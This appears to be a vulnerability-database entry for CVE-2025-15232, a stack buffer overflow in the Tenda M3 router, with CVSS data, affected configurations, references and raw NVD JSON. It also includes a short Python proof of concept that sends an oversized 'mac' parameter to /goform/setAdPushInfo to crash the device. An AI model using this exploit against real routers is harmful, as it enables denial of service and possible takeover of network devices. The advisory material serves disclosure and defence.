CVE-2025-15232

Description

A vulnerability was identified in Tenda M3 1.0.0.13(4903). This vulnerability affects the function formSetAdPushInfo of the file /goform/setAdPushInfo. The manipulation of the argument mac/terminal leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:m3_firmware:1.0.0.13\(4903\):*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:m3:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda M3 1.0.0.13(4903)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-15232 PoC - Tenda M3 Stack Buffer Overflow
# Target: Tenda M3 1.0.0.13(4903)
# Endpoint: /goform/setAdPushInfo
# Vulnerability: Stack-based buffer overflow in formSetAdPushInfo function

target_ip = "192.168.0.1"  # Change to target IP
target_port = 80

# Generate payload with oversized mac parameter
# The buffer overflow occurs when mac/terminal argument exceeds expected size
payload_size = 1024  # Adjust based on target
malicious_mac = "A" * payload_size

url = f"http://{target_ip}:{target_port}/goform/setAdPushInfo"

data = {
    "mac": malicious_mac,
    "terminal": "test_device"
}

try:
    response = requests.post(url, data=data, timeout=10)
    print(f"[*] Request sent to {url}")
    print(f"[*] Payload size: {payload_size} bytes")
    print(f"[*] Response status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[!] Request failed: {e}")

# For remote code execution, construct ROP chain targeting MIPS architecture
# Note: Requires firmware analysis to find suitable gadgets

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15232
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15232
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15232/
[4] VulDB https://vuldb.com/cve/CVE-2025-15232
[5] https://github.com/dwBruijn/CVEs/blob/main/Tenda/setAdPushInfo.md
[6] https://vuldb.com/?ctiid.338628
[7] https://vuldb.com/?id.338628
[8] https://vuldb.com/?submit.725494
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15232", "sourceIdentifier": "[email protected]", "published": "2025-12-30T08:15:43.040", "lastModified": "2026-01-02T21:17:26.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Tenda M3 1.0.0.13(4903). This vulnerability affects the function formSetAdPushInfo of the file /goform/setAdPushInfo. The manipulation of the argument mac/terminal leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:m3_firmware:1.0.0.13\\(4903\\):*:*:*:*:*:*:*", "matchCriteriaId": "7E8A3AB9-7717-427B-8C76-1A5BCF42C08E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:m3:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8543333-41FC-48B4-B14C-D763495A1017"}]}]}], "references": [{"url": "https://github.com/dwBruijn/CVEs/blob/main/Tenda/setAdPushInfo.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338628", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338628", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725494", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}